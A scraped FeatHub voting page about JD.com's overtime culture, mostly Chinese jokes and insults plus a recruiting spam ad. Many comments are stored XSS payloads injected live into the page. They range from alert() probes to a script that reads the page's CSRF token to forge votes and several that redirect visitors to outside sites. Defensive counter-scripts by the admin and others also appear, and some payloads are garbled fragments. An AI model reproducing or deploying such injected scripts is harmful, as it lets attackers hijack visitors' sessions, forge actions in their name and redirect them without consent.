LinXueyuanStdio/996.ICU

京东(假装置顶:投票正常能用。查看评论请禁用JavaScript)

LinXueyuanStdio asked for this feature 10 months ago — 88 comments

LinXueyuanStdio commented 10 months ago Admin

cshsoft commented 10 months ago

垃圾二手东 .坑逼

chrisgang commented 10 months ago

| 641500461 commented 10 months ago

傻逼京东

| nicle-lin commented 10 months ago

真的吗?

liyabin1105 commented 10 months ago

这么多票,你们还是东哥的兄弟吗

lobtao commented 10 months ago

东哥的战友

| solebeibei commented 10 months ago

兄弟

| ZenYuan commented 10 months ago

d东哥不要兄弟了

dblclick commented 10 months ago

真视我 崽种

| Coleman-p commented 10 months ago

说实话小公司真不敢往上写,加班更不要命

| gxkyrftx commented 10 months ago

你们不是东哥的兄弟了,hhh

| linyusen1995 commented 10 months ago

让东哥情何以堪?

shanrain commented 10 months ago

东哥把你当兄弟哈哈哈

| ziiber commented 10 months ago

哈哈哈哈 还是不是东哥的兄弟了?

JHsunshine commented 10 months ago

兄弟们不要光投票,把具体情况也讲一讲啊

| Simon-Leung commented 10 months ago

活该仙人跳,狗东

17701253801 commented 10 months ago

我估计有些公司要被吓尿了

| saschapojot commented 10 months ago

咚咚锵就要惨死下水道无人问津噜

nimil commented 10 months ago

东哥把你们当兄弟,你们却在这里投票

zncook commented 10 months ago

女乃妹妹后来怎么样了?

RicoLiu commented 10 months ago

东哥把你们当兄弟

| BosenY commented 10 months ago

你们竟然在背后搞东哥

zhou-hai commented 10 months ago

奶茶哭晕在厕所。。。

w460931543 commented 10 months ago

What happened

sorrymeto commented 10 months ago

中国gdp,996工作制真心贡献不少。

| mpkmapengkai commented 10 months ago

在座的各位连东哥都不认了么?

| renzhe12138 commented 10 months ago

垃圾二手东

multiplatformsgamer commented 10 months ago

这网站直接用的github的账号。基本上nickname都一样。怎么匿名。网站太卡

| prettychaoyao commented 10 months ago

不然,东哥怎么给得起过夜费

sagiwei commented 10 months ago

工资范围越详细越好???这里投机的人可真多

leyuxinsi commented 10 months ago

大家还是不是东哥兄弟了。

y18zhou commented 10 months ago

JD没有996吧,看来是文化太拉仇恨了。

zhaoqingzhi commented 10 months ago

gg

kanboom commented 10 months ago

666

| yesjustnoname commented 10 months ago

你把东子当兄弟,东子把你当条狗

carolove commented 10 months ago

哈哈京东被黑的最惨的一天

| ostopuro commented 10 months ago

| lc338310659 commented 10 months ago

除了电子产品还行和七天无理由退换货政策以外,我对京东没啥好印象。

qq1057119720 commented 10 months ago

强东:我拿你当兄弟,你在这计较这点时间

gh0stkey commented 10 months ago

NinnHou commented 10 months ago

程序员的血汗工厂么。

| redappless commented 10 months ago

狗比东,秋招面试坑了多少人(被去年秋招坑了点赞)。给个侮辱价,加班不给钱,还不如华为,cnm

zhuanggy commented 10 months ago

京东商城前台体系,995,加班排名制,没有加班补贴。

skychx commented 10 months ago

/>alert('1')

d9823 commented 10 months ago

alert("我一个Android开发者都学会了xss注入~~~~~ 这成本也太低了吧")

intrhuting commented 10 months ago

东哥:我给兄弟们带来了一点小礼物,996,大家好好干,我不会亏待大家。好了,我先回家陪奶茶妹妹了。

zx1013196355 commented 10 months ago

嘿嘿

zx1013196355 commented 10 months ago

我要特殊点

| a346076818886 commented 10 months ago

alert('111111')

qingfengjiang commented 10 months ago

alert('hello');

intrhuting commented 10 months ago

美国上市互联网企业,总部上海,硅谷、北京、深圳、广州、台北都有办公点,全球业务,飞速发展中,开发、运营、产品、销售、商务、设计职位都在招人,薪资丰厚,10点上班,6点多下班,一周5天,拒绝996,不进icu。想内推加v:sharehealthy

jokyme commented 10 months ago

">

666sbX commented 10 months ago

jokyme while有意思?记住一点,你大爷还是你大爷

MagicGary commented 10 months ago

MagicGary commented 10 months ago

window.alert = function() { return false; }

| LinXueyuanStdio commented 10 months ago Admin

table{visibility: collapse;}

| LinXueyuanStdio commented 10 months ago Admin

var commentBodySet = document.getElementsByClassName("body");for(var i=0;i

leo66123 commented 10 months ago

VeHan commented 10 months ago

你们都是魔鬼吗

VeHan commented 10 months ago

快来喷这个人,他弄个死循环

https://github.com/leo66123/leo66123.github.io/issues/1

| LinXueyuanStdio commented 10 months ago Admin

img,svg,table{visibility: collapse;}

| xilibili commented 10 months ago

618赶上端午节,0点到24点加班居然不让提。。。

reinit commented 10 months ago

Please report XSS vulnerability

var xmlReq = new XMLHttpRequest(); xmlReq.addEventListener("load", function() { alert("Please report XSS vulnerability at https://feathub.com/feathub/feathub/+65, or https://feathub.com/feathub/feathub/+66 if you love me."); }); xmlReq.open("POST", "https://feathub.com/feathub/feathub/+65/vote?vote[score]=1"); xmlReq.send();

reinit commented 10 months ago

Please report XSS vulnerability

var xmlReq = new XMLHttpRequest(); xmlReq.addEventListener("load", function() { alert("Please report XSS vulnerability at https://feathub.com/feathub/feathub/+65, or https://feathub.com/feathub/feathub/+66 if you love me."); }); xmlReq.open("POST", "https://feathub.com/feathub/feathub/+65/vote?vote[score]=1", true); xmlReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xmlReq.setRequestHeader("Cache-Control", "no-cache"); xmlReq.setRequestHeader("Referer", "https://feathub.com/feathub/feathub/+65"); xmlReq.send("method=patch&authenticitytoken=" + document.head.querySelector("[name~=csrf-token][content]").content);

ThomasHuang025 commented 10 months ago

const observer = new MutationObserver(mutations => { mutations.forEach(({ addedNodes }) => { addedNodes.forEach(node => { if(node.tagName === 'SCRIPT') { node.type = 'javascript/blocked' node.parentElement.removeChild(node) const beforeScriptExecuteListener = function (event) { event.preventDefault() node.removeEventListener('beforescriptexecute', beforeScriptExecuteListener) } node.addEventListener('beforescriptexecute', beforeScriptExecuteListener) } }) }) }) observer.observe(document.documentElement, { childList: true, subtree: true })

| LinXueyuanStdio commented 10 months ago Admin

我是管理员,借楼说明一下。

恶意把XSS攻击方法发布到公众号和知乎等平台的米斯特安全团队,根本没联系过我,我这个和FeatHub关联的账号明明有邮箱的,但是没有收到任何一封邮件是关于漏洞的。也就是说,它在发现漏洞后,第一时间把漏洞公开,根本不给FeatHub反应时间,违背了一个信息安全人员应有的职业道德。

然后是怎么修复的问题。这个我管不了,因为FeatHub根本没有删除功能。也就是说,不能删评论,不能删 project,除了改改标题,打开关闭,没了。嗯,README也没得加,置顶也没有(虽然可以用京东假装置顶)

XSS的漏洞只能联系官方解决。。但是我看了一下,很奇怪,官方自己没给联系方式。。。只有一个repo和twitter,但是很久没更新了。。

(话说官方诈死,这么大流量还没崩,这是什么神仙服务器哈哈哈)

superzmy commented 10 months ago

我觉得要不弄个自动删除script的脚本?

superzmy commented 10 months ago

for(var x of document.getElementsByClassName("body")) { if (x.innerHTML.indexOf("script") >= 0) x.innerHTML = ""; }

<script> for(var x of document.getElementsByClassName("body")) { if (x.innerHTML.indexOf("script") >= 0) x.innerHTML = ""; } <script>

| zzxcvbnm19 commented 10 months ago

asdasd

| zzxcvbnm19 commented 10 months ago

sadasd

| zzxcvbnm19 commented 10 months ago

dasd

| zzxcvbnm19 commented 10 months ago

sdasd

| zzxcvbnm19 commented 10 months ago

| zzxcvbnm19 commented 10 months ago

superzmy 老哥,你传的最后一个脚本把下面都隐藏了

| zzxcvbnm19 commented 10 months ago

缺东西,给你圆回来了☺

guotao commented 10 months ago

If it were too difficult to allow as the folder under root, location.href="https://blogs.kainy.cn/?from=feathubXSS2" how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。

guotao commented 10 months ago

If it were too difficult to allow as the folder under root, location.href="https://blogs.kainy.cn/?from=feathubXSS2" how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。

guotao commented 10 months ago

If it were too difficult to allow as the folder under root, location.href="https://blogs.kainy.cn/?from=feathubXSS2" ; setTimeout("javascript:location.href='hello.html'", 0); how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。

guotao commented 10 months ago

If it were too difficult to allow as the folder under root, location.href='https://blogs.kainy.cn/?from=feathubXSS2'; setTimeout("javascript:location.href='hello.html'", 0); how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。

guotao commented 10 months ago

If it were too difficult to allow as the folder under root, window.location.href='https://blogs.kainy.cn/?from=feathubXSS2'; setTimeout("javascript:location.href='hello.html'", 0); how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。

guotao commented 10 months ago

If it were too difficult to allow as the folder under root, window.location.href='https://blogs.kainy.cn/?from=feathubXSS2'; setTimeout("javascript:location.href='hello.html'", 0); how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。

guotao commented 10 months ago

If it were too difficult to allow as the folder under root, window.location.href='https://blogs.kainy.cn/?from=feathubXSS2'; setTimeout("javascript:location.href='hello.html'", 0); how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。,。。

wtf996 commented 10 months ago

window.location.href='https://www.qwq.wtf/?from=XSS';

guotao commented 10 months ago

If it were too difficult to allow as the folder under root, window.location.href='https://blogs.kainy.cn/?from=feathubXSS2'; setTimeout("javascript:location.href='hello.html'", 0); how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。  。

guotao commented 10 months ago

If it were too difficult to allow as the folder under root, window.location.href='https://blogs.kainy.cn/?from=feathubXSS2'; setTimeout("javascript:location.href='hello.html'", 0); how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。 ]>([\s\S])<\/body>/)[1].replace(/<?script?>/g,'').replace(/<\/?script?>/g,'').replace(//g, '')}};xmlhttp.open('GET',window.location.href,true);xmlhttp.send() }, 0)"/>  。

| kongkongye commented 5 months ago

test

Join the discussion!

Sign-in with GitHub to comment